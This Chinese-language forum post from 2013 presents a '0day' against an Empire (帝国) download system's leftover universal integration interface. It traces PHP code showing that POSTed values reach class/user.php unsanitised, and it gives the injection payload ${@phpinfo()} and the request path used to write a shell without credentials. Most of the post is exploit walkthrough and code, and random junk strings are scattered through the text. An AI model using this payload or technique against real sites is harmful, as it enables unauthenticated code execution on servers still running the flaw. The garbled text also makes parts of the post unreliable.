找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2299|回复: 0
打印 上一主题 下一主题

帝国万能接口漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 09:34:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们$ [. R! B2 H7 v  r( a
) ~) q0 O  S7 t3 A

+ J+ F% a5 p1 D' [8 n
这是帝国的一套下载系统 如图. c: f' v5 X2 k7 e
ps(不需要任何账户和密码,直接写shell)

7 s6 O% \3 ?& J& g

由于很多站是由于下载要整合discuz 等等一些论坛....
- ?$ y% E3 t/ i' A


0 K6 f# H) E3 @

而帝国他又有一个万能接口,如图


: [0 @$ F, n- r" t  \% I
/ D: T& ^- O1 r: E, F0 ~$ q# y+ M* ^$ T9 E) m  W

而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
1 M7 k& p' d' C9 u8 s* z# G1 l
6 `1 D3 P4 X2 S当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig

1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}

复制代码

他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
- K* ]+ c4 k  T' e- w" l, k( ^: I7 ^; m, }* S- F
在data/fun.php中的15行
& t0 l' L* m+ z8 f1 B: R% P3 [  K& k0 r1 Y: _
我们可以看到这个函数

1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {; R' e: ~$ e& V2 Y4 G+ }
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);

复制代码

.....//省略若干, ~: c# l% t1 n

. {  Q* e7 i$ H# b这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
' Z" g4 w% \6 t- D1 _3 o4 p
3 K3 h2 Q' E; K; T他将传进来的变量进行了切割,然后赋给了$filetext
" d8 \3 b: i9 L, ]; ]
2 E0 N. Y6 D8 d; Z9 i, b4 v然后看下面

1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
6. }
7. @fputs($fp,$filetext);

复制代码

打开了一个class/user.php文件,然后将$filetext写入了$ m+ c0 L# G9 S# y

/ o* V9 p' e9 S我们看看写入的结果,随便填一个

$ b1 S: b1 K, [' _3 t
, v6 L$ @8 q0 a4 {! q

$ O" `. x9 ?& \! K/ ?
# ]" J$ k( @% x3 x% x
8 A  a1 P- y4 l) T

) q6 {# ~; {) V( M3 r8 A7 B/ G+ D$ r. h; y2 X' J+ F* @2 `

0 j6 R. b+ o, ?7 r. Z

( H+ v+ R" a7 Y" r
# f2 \1 r& ]' I( ~# q1 L( e. u2 E! M
6 G# r$ l0 o3 k
9 X1 R% U8 |2 ^! T( J9 z2 V+ y7 h
& c: }# C5 o% S" {. r4 [- J

- v6 f' |0 w+ T( v/ B6 O

, X$ L6 U. p$ z! g4 G
  {: T# w, [. ^; B' f
9 X+ W  T7 _, l1 d' p, }
: K/ V) H" D4 A1 k
; m6 [5 l2 R4 M% P) J' |1 p1 O$ D$ G3 k- s+ O& K- B' D# d2 F( a

' a0 P' g6 b: n+ ~$ X$ v) @+ B
% y: {6 V. _( H$ S6 J

所以我们淫荡点,写个${@phpinfo()}试试


9 f6 i, {0 b/ N* v$ |: R

然后访问以下class/user.php这个文件
3 ^7 N" V6 [7 p) p+ |  E6 d* M$ ^日了吧

. j7 n: h9 R& I% g( j' G- J! J, c$ n

, Z& ^; H. J1 {/ l8 [: E

; n- q- Z- h4 q
/ J2 q' Q- m8 ^( W2 B: a

& n3 X* m$ S; ^

  f8 j5 l( h+ k" `& D" K/ l- _

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表